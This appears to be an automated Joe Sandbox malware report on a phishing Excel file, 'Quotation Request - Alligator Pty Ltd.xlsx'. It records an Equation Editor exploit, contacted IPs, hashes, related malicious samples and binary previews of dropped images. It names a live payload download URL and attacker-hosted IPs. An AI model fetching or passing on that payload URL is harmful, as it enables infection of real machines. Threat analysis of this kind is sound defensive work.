http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmp | false | none | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmp | false | none | high
http://treyresearch.net | explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.500770240.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
107.173.191.75 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
162.210.195.97 | travelgleam.com | United States | 30633 | LEASEWEB-USA-WDCUS | true

                                        Private

                                        IP
                                        192.168.2.22
                                        192.168.2.255

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:532880
                                        Start date:02.12.2021
                                        Start time:19:16:45
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 14s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Quotation Request - Alligator Pty Ltd.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@9/24@4/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 22.2% (good quality ratio 21.4%)
                                        • Quality average: 76.3%
                                        • Quality standard deviation: 27.1%
                                        HCA Information:
                                        • Successful, ratio: 91%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532880/sample/Quotation Request - Alligator Pty Ltd.xlsx

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
19:17:47 | API Interceptor | 68x Sleep call for process: EQNEDT32.EXE modified
19:17:55 | API Interceptor | 75x Sleep call for process: vbc.exe modified
19:18:22 | API Interceptor | 209x Sleep call for process: msiexec.exe modified
19:19:09 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match | Associated Sample Name / URL | Detection | Context
107.173.191.75 | quotation-linde-tunisia-plc-december-2021.xlsx | malicious | 107.173.191.75/dodge/winlogon.exe
 | Quotation - Linde Tunisia PLC..xlsx | malicious | 107.173.191.75/dodge/winlogon.exe
 | Quotation - Linde Tunisia PLC....xlsx | malicious | 107.173.191.75/dodge/winlogon.exe

                                        Domains

Match | Associated Sample Name / URL | Detection | Context
minisite.alibaba.com.gds.alibabadns.com | po.exe | malicious | 205.204.101.158
 | BvuKqSpgIG.exe | malicious | 198.11.132.10
 | po071.exe | malicious | 198.11.132.10
 | REQUEST FOR QUOTATION.exe | malicious | 205.204.101.158

                                        ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | PO6738H.xlsx | malicious | 107.172.73.132
 | 4514808437.xlsx | malicious | 198.46.136.201
 | Payment advise.xlsx | malicious | 192.3.110.203
 | Bank copy.xlsx | malicious | 107.173.143.102
 | SHIPPING DOCUMENTS.xlsx | malicious | 198.46.136.201
 | Cpia de LISTA FINAL TAIS - Orcamento.xlsx | malicious | 198.23.207.39
 | Shipping report -17420.xlsx | malicious | 107.173.143.36
 | sCmjcSzzHE | malicious | 23.94.36.134
 | P.O SPECIFICATION.xlsx | malicious | 107.172.73.132
 | 67068l4VSZ | malicious | 23.94.36.134
 | AEX-TR02122021.xlsx | malicious | 107.172.76.210
 | YRL3GshhZ2 | malicious | 23.94.36.134
 | n1rNOMyyzF | malicious | 23.94.36.134
 | XjwFx9RaZW | malicious | 23.94.36.134
 | uVAge0xrAe | malicious | 23.94.36.134
 | CViGmlFN5W | malicious | 23.94.36.134
 | 2KaqtqT95M | malicious | 23.94.36.134
 | TkO4AGGKc2 | malicious | 23.94.36.134
 | G7pPgOFUzF | malicious | 23.94.36.134
 | 5C4B2IVIW9 | malicious | 23.94.36.134
LEASEWEB-USA-WDCUS | BKyU0T5xcw | malicious | 207.244.67.163
 | EwrGOFT5pd.exe | malicious | 207.244.91.129
 | tVStWV6q3E | malicious | 216.22.1.160
 | vbc.exe | malicious | 207.244.91.129
 | Lv9eznkydx.exe | malicious | 207.58.141.248
 | 28jJSvNzXz.exe | malicious | 108.59.2.51
 | 29nr5GdK5M.exe | malicious | 207.244.95.223
 | FkJcMEZd4i.exe | malicious | 207.244.95.223
 | SQLPLUS.EXE | malicious | 199.115.116.162
 | HoGxvkYZd5 | malicious | 207.244.67.153
 | Quotation For This Order 091621.exe | malicious | 23.82.12.32
 | U9PlTfwfk7.exe | malicious | 23.105.171.65
 | championship.dll | malicious | 108.62.118.69
 | DHL DOCUMENTS.exe | malicious | 23.82.12.31
 | Purchase order_dated 08-14-2021.exe | malicious | 23.82.12.32
 | Balance payment advice.exe | malicious | 23.82.12.30
 | 7NuxE5BCX7 | malicious | 206.214.217.6
 | RhalEFwYre.exe | malicious | 23.82.12.30
 | doc783748934334 PDF.exe | malicious | 207.244.67.139
 | 88AB0FB7AAB828733D7FAD8DD72BA73C7188803ED85C1.exe | malicious | 162.210.196.173

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):513443
                                        Entropy (8bit):7.37315837962637
                                        Encrypted:false
                                        SSDEEP:12288:7lIKV65P7x6p5laFBAteHb9Pzrv4QHA5A:7Cq47xO5MXAtYxbrQgAe
                                        MD5:8E90E8E526BC80036BA6B50A913A1880
                                        SHA1:56F076B442E362E58E787FCEA35CEA45A70447EE
                                        SHA-256:50901C9BDF963127A05847C8C0A1D71D8C02310C491A159CF87A1E888CEAB348
                                        SHA-512:60F5346007C19104284630001F665AE8B74C71DAB5B7BF8D6A60AA639281929A0F8E60DED6150A3B395DD56C0DC0A5B13824329CA1C093EC96ACAAAF50A0E5BA
                                        Malicious:true
                                        Reputation:low
                                        IE Cache URL:http://107.173.191.75/dodge/winlogon.exe
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\196BE5C3.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CC27E4A.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3668CB87.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AF4462D.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A24FD9.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):498420
                                        Entropy (8bit):0.6413691154982258
                                        Encrypted:false
                                        SSDEEP:384:LTXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:fXwBkNWZ3cjvmWa+VDO
                                        MD5:3FBB8612EB4F2A6F9C2C41768FE72538
                                        SHA1:AAEFDEA1B614967532F5207AE0F38350B8753937
                                        SHA-256:986C659A2B737254905B4315A1437BEF4A81A3DBDADB3F00BD9637D3F377D636
                                        SHA-512:EBAD5D7E9BB93A4FC76EED47B96ED6F3AE0790FC075AD8B706745E1198FBCF3BB7D2CC03FDF39900C971EECA6E8CEECF1AC84DB61859F51352A7B6F59BDFA9BE
                                        Malicious:false
                                        Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-P$.......f7P.@o.%......(............RQ.Q.............p..$Q.Q...... ...Id7P...... ............d7P............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X..........8/P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\486A184F.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\518BFEB2.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C9B604.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5481F451.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5927D635.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64991FDC.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAF8DB0B.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9FC8190.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
